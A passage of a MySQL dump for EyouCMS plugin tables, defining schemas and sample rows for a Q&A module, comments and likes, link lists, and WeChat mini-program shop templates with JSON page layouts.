`is_review` tinyint(1) NOT NULL DEFAULT '1' COMMENT '问题是否审核,1是,0否',
`follow` tinyint(1) NOT NULL DEFAULT '0' COMMENT '关注问题则表示有回复时发送邮件通知到问题发布人',
`solve_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '解决时间(这个问题存在最佳答案则表示已解决)',
`bestanswer_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '最佳答案',
`sort_order` int(10) NOT NULL DEFAULT '100' COMMENT '排序号',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`ask_id`)
) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='问题表';
-- -----------------------------
-- Table structure for `ey_weapp_ask_answer`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_ask_answer`;
CREATE TABLE `ey_weapp_ask_answer` (
`answer_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`ask_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题ID',
`is_bestanswer` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否最佳答案,0否,1是',
`is_review` tinyint(1) NOT NULL DEFAULT '1' COMMENT '问题是否审核,1是,0否',
`type_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题栏目ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`username` varchar(50) NOT NULL DEFAULT '' COMMENT '用户名',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞量',
`users_ip` varchar(30) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`content` text NOT NULL COMMENT '内容',
`ifcheck` tinyint(1) NOT NULL DEFAULT '1',
`answer_pid` int(10) NOT NULL DEFAULT '0' COMMENT '子答案的父答案',
`at_users_id` int(10) NOT NULL DEFAULT '0' COMMENT '被@的用户ID',
`at_answer_id` int(10) NOT NULL DEFAULT '0' COMMENT '@答案ID',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`answer_id`)
) ENGINE=MyISAM AUTO_INCREMENT=19 DEFAULT CHARSET=utf8 COMMENT='答案表';
-- -----------------------------
-- Table structure for `ey_weapp_ask_answer_like`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_ask_answer_like`;
CREATE TABLE `ey_weapp_ask_answer_like` (
`like_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`ask_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '问题ID',
`answer_id` int(10) NOT NULL DEFAULT '0' COMMENT '答案ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '用户ID',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞',
`users_ip` varchar(30) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`add_time` int(10) unsigned NOT NULL DEFAULT '0',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`like_id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COMMENT='答案点赞表';
-- -----------------------------
-- Table structure for `ey_weapp_ask_type`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_ask_type`;
CREATE TABLE `ey_weapp_ask_type` (
`type_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '栏目自增',
`type_name` varchar(100) NOT NULL DEFAULT '' COMMENT '栏目名称',
`parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '上级ID',
`sort_order` int(10) unsigned NOT NULL DEFAULT '100' COMMENT '排序号',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`type_id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COMMENT='问题栏目分类表';
-- -----------------------------
-- Records of `ey_weapp_ask_type`
-- -----------------------------
INSERT INTO `ey_weapp_ask_type` VALUES ('1', '问题求助', '0', '100', '1565770890', '1648617311');
INSERT INTO `ey_weapp_ask_type` VALUES ('2', '功能建议', '0', '100', '1565770890', '1648617311');
INSERT INTO `ey_weapp_ask_type` VALUES ('3', '业务咨询', '0', '100', '1565770890', '1648617311');
INSERT INTO `ey_weapp_ask_type` VALUES ('4', 'BUG反馈', '1', '100', '1565771021', '1648617311');
INSERT INTO `ey_weapp_ask_type` VALUES ('5', '其他问题', '1', '100', '1565771021', '1648617311');
-- -----------------------------
-- Table structure for `ey_weapp_ask_users_level`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_ask_users_level`;
CREATE TABLE `ey_weapp_ask_users_level` (
`level_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`level_name` varchar(30) DEFAULT '' COMMENT '级别名称',
`level_value` int(10) DEFAULT '0' COMMENT '会员等级值',
`ask_count` int(10) DEFAULT '5' COMMENT '发布问答次数限制',
`answer_count` int(10) DEFAULT '0' COMMENT '回复问答次数限制',
`ask_is_release` tinyint(1) DEFAULT '1' COMMENT '允许在问答中发布问题,1=是,0=否',
`ask_is_review` tinyint(1) DEFAULT '0' COMMENT '在问答中发布问题或回答是否需要审核,1=是,0=否',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`level_id`) USING BTREE
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COMMENT='上传记录表';
-- -----------------------------
-- Table structure for `ey_weapp_bshoucang`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_bshoucang`;
CREATE TABLE `ey_weapp_bshoucang` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`title` varchar(50) DEFAULT '' COMMENT '网站标题',
`url` varchar(100) DEFAULT '' COMMENT '网站地址',
`logo` varchar(255) DEFAULT '' COMMENT '网站LOGO',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`target` tinyint(1) DEFAULT '0' COMMENT '是否开启浏览器新窗口',
`intro` text COMMENT '网站简况',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=显示,0=屏蔽)',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Table structure for `ey_weapp_collection`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_collection`;
CREATE TABLE `ey_weapp_collection` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_id` int(10) DEFAULT NULL,
`title` varchar(50) DEFAULT '' COMMENT '网站标题',
`url` varchar(100) DEFAULT '' COMMENT '网站地址',
`lang` varchar(50) DEFAULT '' COMMENT '语言标识',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_collection`
-- -----------------------------
INSERT INTO `ey_weapp_collection` VALUES ('2', '2', '袋式除尘器处理风量是怎么计算', '29', 'cn', '1609829251', '1609829251');
-- -----------------------------
-- Table structure for `ey_weapp_comment`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_comment`;
CREATE TABLE `ey_weapp_comment` (
`comment_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`is_bestanswer` tinyint(1) NOT NULL DEFAULT '0' COMMENT '是否最佳答案,0否,1是',
`is_review` tinyint(1) NOT NULL DEFAULT '1' COMMENT '问题是否审核,1是,0否',
`users_id` int(10) NOT NULL DEFAULT '0' COMMENT '评论用户ID',
`username` varchar(50) NOT NULL DEFAULT '' COMMENT '评论用户名',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞量',
`users_ip` varchar(30) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`content` text NOT NULL COMMENT '内容',
`pid` int(10) NOT NULL DEFAULT '0' COMMENT '子评论的父评论',
`at_users_id` int(10) NOT NULL DEFAULT '0' COMMENT '被@的用户ID',
`at_comment_id` int(10) NOT NULL DEFAULT '0' COMMENT '@答案ID',
`add_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`comment_id`),
KEY `aid` (`aid`),
KEY `users_id` (`users_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='文档评论回复表';
-- -----------------------------
-- Records of `ey_weapp_comment`
-- -----------------------------
INSERT INTO `ey_weapp_comment` VALUES ('1', '439', '0', '1', '1', 'admin', '1', '127.0.0.1', '<p><span style="font-family: &quot;Microsoft YaHei&quot;, Arial, Helvetica, sans-serif; font-size: 15px; background-color: rgb(255, 255, 255);">网站经过优化稳定后,在网站可用数据稳定上升的前提下,可以考虑增加交换更多的高权重友情链接。此时,友情链接的交换不能是单一的关键词链接,而是可以扩展网站的权限,追求多词多页权重的平均增加,从而帮助更多的收录和原创内容再次被收录到页面的内容排名中。</span></p>', '0', '0', '0', '1627893894', '1628058396');
-- -----------------------------
-- Table structure for `ey_weapp_comment_level`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_comment_level`;
CREATE TABLE `ey_weapp_comment_level` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`users_level_id` int(10) NOT NULL DEFAULT '0' COMMENT '会员级别ID',
`is_comment` tinyint(1) NOT NULL DEFAULT '1' COMMENT '是否允许评论文档',
`is_review` tinyint(1) NOT NULL DEFAULT '0' COMMENT '评论是否需要审核',
`add_time` int(10) NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(10) NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8 COMMENT='评论级别表';
-- -----------------------------
-- Records of `ey_weapp_comment_level`
-- -----------------------------
INSERT INTO `ey_weapp_comment_level` VALUES ('1', '0', '0', '1', '1572418214', '1572418214');
INSERT INTO `ey_weapp_comment_level` VALUES ('2', '1', '1', '0', '1626925386', '0');
INSERT INTO `ey_weapp_comment_level` VALUES ('3', '2', '1', '0', '1626925386', '0');
INSERT INTO `ey_weapp_comment_level` VALUES ('4', '3', '1', '0', '1626925386', '0');
-- -----------------------------
-- Table structure for `ey_weapp_comment_like`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_comment_like`;
CREATE TABLE `ey_weapp_comment_like` (
`like_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT '自增ID',
`aid` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '文档ID',
`comment_id` int(10) NOT NULL DEFAULT '0' COMMENT '评论ID',
`users_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞用户ID',
`click_like` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '点赞',
`users_ip` varchar(20) NOT NULL DEFAULT '' COMMENT '用户IP地址',
`add_time` int(10) unsigned NOT NULL DEFAULT '0',
`update_time` int(10) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`like_id`),
KEY `aid` (`aid`,`comment_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COMMENT='文档评论点赞表';
-- -----------------------------
-- Records of `ey_weapp_comment_like`
-- -----------------------------
INSERT INTO `ey_weapp_comment_like` VALUES ('1', '439', '1', '1', '1', '127.0.0.1', '1628058396', '1628058396');
-- -----------------------------
-- Table structure for `ey_weapp_demo`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_demo`;
CREATE TABLE `ey_weapp_demo` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`typeid` tinyint(1) DEFAULT '1' COMMENT '类型:1=文字链接,2=图片链接',
`title` varchar(50) DEFAULT '' COMMENT '网站标题',
`url` varchar(100) DEFAULT '' COMMENT '网站地址',
`logo` varchar(255) DEFAULT '' COMMENT '网站LOGO',
`sort_order` int(11) DEFAULT '0' COMMENT '排序号',
`target` tinyint(1) DEFAULT '0' COMMENT '是否开启浏览器新窗口',
`email` varchar(50) DEFAULT NULL,
`intro` text COMMENT '网站简况',
`status` tinyint(1) DEFAULT '1' COMMENT '状态(1=显示,0=屏蔽)',
`delete_time` int(11) DEFAULT '0' COMMENT '软删除时间',
`add_time` int(11) DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8;
-- -----------------------------
-- Records of `ey_weapp_demo`
-- -----------------------------
INSERT INTO `ey_weapp_demo` VALUES ('2', '1', '易优CMS', 'http://www.eyoucms.com', '', '100', '1', '', '', '1', '0', '1524975826', '0');
INSERT INTO `ey_weapp_demo` VALUES ('3', '2', '织梦58', 'http://www.dede58.com', 'http://www.eyoucms.dev/public/upload/system/2018/04/29/814ece093a0ba636209255dc20bd6e62.png', '100', '0', '', '', '1', '0', '1524976095', '1524976135');
INSERT INTO `ey_weapp_demo` VALUES ('4', '1', 'ThinkPHP官网', 'http://www.thinkphp.cn', '', '100', '1', '', '', '1', '0', '1525266497', '1525266608');
INSERT INTO `ey_weapp_demo` VALUES ('5', '1', '微信小程序开发教程', 'http://www.yiyongtong.com', '', '100', '1', '', '', '1', '0', '1525748425', '0');
-- -----------------------------
-- Table structure for `ey_weapp_diyminipro_mall`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_diyminipro_mall`;
CREATE TABLE `ey_weapp_diyminipro_mall` (
`mini_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '模板ID',
`categoryid` int(11) NOT NULL DEFAULT '0' COMMENT '分类ID',
`name` varchar(100) NOT NULL DEFAULT '' COMMENT '模板标题',
`litpic` varchar(250) NOT NULL DEFAULT '' COMMENT '封面图',
`component` text NOT NULL COMMENT '组件库',
`mchid` varchar(50) NOT NULL DEFAULT '' COMMENT '微信支付商户号',
`apikey` varchar(250) NOT NULL DEFAULT '' COMMENT '微信支付密钥',
`status` tinyint(1) NOT NULL DEFAULT '0' COMMENT '状态:4=审核中,5=发布',
`cloud_id` int(10) NOT NULL DEFAULT '0' COMMENT '云ID',
`config` text NOT NULL COMMENT '相关序列化信息',
`is_del` tinyint(1) unsigned NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`mini_id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8 COMMENT='微信小程序记录表';
-- -----------------------------
-- Records of `ey_weapp_diyminipro_mall`
-- -----------------------------
INSERT INTO `ey_weapp_diyminipro_mall` VALUES ('3', '39', '购物商城', 'https://service.eyysz.cn/uploads/allimg/20200514/1-200514103G4249.png', 'f1f0UQFSAwMDAwEJUgYFAgBWAAoIAQ8DU1BTVVFWC1dBAloPVBAfWl5SVlwxDFlRDwZJUFkMWQBDGhVfXlELThkCQRVYAV9WH1ReVgYWG0AKBwBdFBFSBENVChpeWhBQVgYfD1AUcVJBH0NQAQ1jUxsXSUFdEEEMUlNOWVZTDVpcAl8gUgFcRl1HHVsOBFldTwQQW1wHGwlYQAcaXFwSXHkKQBUdAVxGQ1xfFRENVkQTJApdXBEbBl5YFldZWwFLdxZHFV4MH1BcXUVYCwtSRCoOBFVdTlQKX0IDX15QFm1QG0c', '', '', '0', '58', 'eyJjb3B5cmlnaHQiOjEsIm1lYWxfdHlwZSI6MH0=', '0', 'cn', '1589423797', '1666759073');
INSERT INTO `ey_weapp_diyminipro_mall` VALUES ('4', '1', '默认商城风格', 'https://service.eyysz.cn/uploads/allimg/20200514/1-200514103G4249.png', '8d9bBlFRVQYIVgkJAg5VAAcEAVNWAVdWWVNSUwZUVQwLVEAaFggLUlcRFVhATAwFDlcVQF0BBglNFwQEEFVcTgteRl8CBElYWRB7WEAUFw8BWm1TTBFPFQQWFwwBUxgACVBcXU0GEF9cAxVeXVcBFQ', '', '', '0', '2', '', '0', 'zh', '1666758479', '1666758479');
INSERT INTO `ey_weapp_diyminipro_mall` VALUES ('5', '1', '默认商城风格', 'https://service.eyysz.cn/uploads/allimg/20200514/1-200514103G4249.png', '8d9bBlFRVQYIVgkJAg5VAAcEAVNWAVdWWVNSUwZUVQwLVEAaFggLUlcRFVhATAwFDlcVQF0BBglNFwQEEFVcTgteRl8CBElYWRB7WEAUFw8BWm1TTBFPFQQWFwwBUxgACVBcXU0GEF9cAxVeXVcBFQ', '', '', '0', '2', '', '0', 'en', '1666758559', '1666758559');
-- -----------------------------
-- Table structure for `ey_weapp_diyminipro_mall_page`
-- -----------------------------
DROP TABLE IF EXISTS `ey_weapp_diyminipro_mall_page`;
CREATE TABLE `ey_weapp_diyminipro_mall_page` (
`page_id` int(11) unsigned NOT NULL AUTO_INCREMENT COMMENT '页面id',
`page_type` tinyint(3) NOT NULL DEFAULT '-1' COMMENT '页面类型(1首页 -1自定义页)',
`page_name` varchar(255) NOT NULL DEFAULT '' COMMENT '页面名称',
`page_data` longtext NOT NULL COMMENT '页面数据',
`mini_id` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '微信小程序id',
`is_home` tinyint(1) NOT NULL DEFAULT '0' COMMENT '设为首页:0=否,1=是',
`is_system` tinyint(1) NOT NULL DEFAULT '0' COMMENT '系统内置',
`is_show` tinyint(1) NOT NULL DEFAULT '1' COMMENT '是否显示:1=显示,0=隐藏',
`is_del` tinyint(3) unsigned NOT NULL DEFAULT '0' COMMENT '伪删除,1=是,0=否',
`lang` varchar(10) NOT NULL DEFAULT 'cn' COMMENT '语言标识',
`add_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '新增时间',
`update_time` int(11) unsigned NOT NULL DEFAULT '0' COMMENT '更新时间',
PRIMARY KEY (`page_id`),
KEY `mini_id` (`mini_id`,`lang`) USING BTREE
) ENGINE=MyISAM AUTO_INCREMENT=27 DEFAULT CHARSET=utf8 COMMENT='微信小程序diy页面表';
-- -----------------------------
-- Records of `ey_weapp_diyminipro_mall_page`
-- -----------------------------
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('18', '7', '会员中心', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u4f1a\\u5458\\u4e2d\\u5fc3\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[{\"name\":\"\\u4f1a\\u5458\\u4e2d\\u5fc3\",\"type\":\"userCenter\",\"params\":{\"recomNum\":6,\"recomShow\":\"1\",\"titleArr\":[\"\\u4e0d\\u663e\\u793a\",\"\\u6700\\u65b0\",\"\\u63a8\\u8350\",\"\\u6700\\u70ed\"],\"recomTitle\":\"\\u53ef\\u80fd\\u4f60\\u8fd8\\u60f3\\u8981\"},\"style\":{\"show_type\":10,\"background\":\"#ffffff\"},\"defaultData\":[{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"}]}],\"tabbar\":{\"name\":\"\\u5e95\\u90e8\\u83dc\\u5355\\u7ec4\",\"type\":\"tabBar\",\"style\":{\"color\":\"#666666\",\"selectedColor\":\"#e93b3d\",\"background\":\"#ffffff\"},\"adddata\":{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/custom-active.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},\"data\":[{\"pagePath\":\"\\/pages\\/index\\/index\",\"text\":\"\\u9996\\u9875\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/home.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q059363L.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"index_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/category\\/index\",\"text\":\"\\u5206\\u7c7b\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/cate.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q05945328.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"category_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/flow\\/index\",\"text\":\"\\u8d2d\\u7269\\u8f66\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/flow.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10215415.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"flow_index\",\"value\":\"\",\"is_vars\":0}},{\"pagePath\":\"\\/pages\\/user\\/index\",\"text\":\"\\u6211\\u7684\",\"iconPath\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/tabbar\\/user.png\",\"selectedIconPath\":\"https:\\/\\/service.eyysz.cn\\/uploads\\/allimg\\/20200518\\/1-20051Q10223462.png\",\"color\":\"\",\"selectedColor\":\"\",\"url\":\"\",\"pathconf\":{\"index\":\"user_index\",\"value\":\"\",\"is_vars\":0}}],\"id\":4},\"diyStyle\":{\"titleModel\":{\"style\":4,\"text\":{\"source\":\"default\",\"default\":{\"size\":15,\"color\":\"#000000\"},\"custom\":{\"size\":15,\"color\":\"#000000\"}},\"linesbackground\":\"#00aeff\"},\"commonModel\":{\"background\":\"#f4f4f4\",\"navtitleTextColor\":\"black\",\"navtitleBackgroundColor\":\"#ffffff\"}}}', '3', '0', '1', '1', '0', 'cn', '1604452245', '1666062563');
INSERT INTO `ey_weapp_diyminipro_mall_page` VALUES ('19', '6', '购物车', '{\"page\":{\"type\":\"page\",\"name\":\"\\u9875\\u9762\\u8bbe\\u7f6e\",\"params\":{\"title\":\"\\u8d2d\\u7269\\u8f66\",\"share_title\":\"\\u5206\\u4eab\\u6807\\u9898\"}},\"items\":[{\"name\":\"\\u8d2d\\u7269\\u8f66\",\"type\":\"cart\",\"params\":{\"recomNum\":6,\"recomShow\":1,\"titleArr\":[\"\\u4e0d\\u663e\\u793a\",\"\\u6700\\u65b0\",\"\\u63a8\\u8350\",\"\\u6700\\u70ed\"],\"recomTitle\":\"\\u53ef\\u80fd\\u4f60\\u8fd8\\u60f3\\u8981\"},\"style\":{\"show_type\":10,\"background\":\"#ffffff\"},\"defaultData\":[{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 \\u4e0d\\u5bb9\\u9519\\u8fc7\",\"stock_count\":\"100\",\"sales_num\":\"10\"},{\"title\":\"\\u6b64\\u5904\\u663e\\u793a\\u5546\\u54c1\\u540d\\u79f0\",\"litpic\":\"https:\\/\\/service.eyysz.cn\\/public\\/static\\/common\\/diyminipro\\/img\\/diy\\/goods\\/01.png\",\"users_price\":\"99.00\",\"old_price\":\"139.00\",\"seo_description\":\"\\u6b64\\u6b3e\\u5546\\u54c1\\u7f8e\\u89c2\\u5927\\u65b9 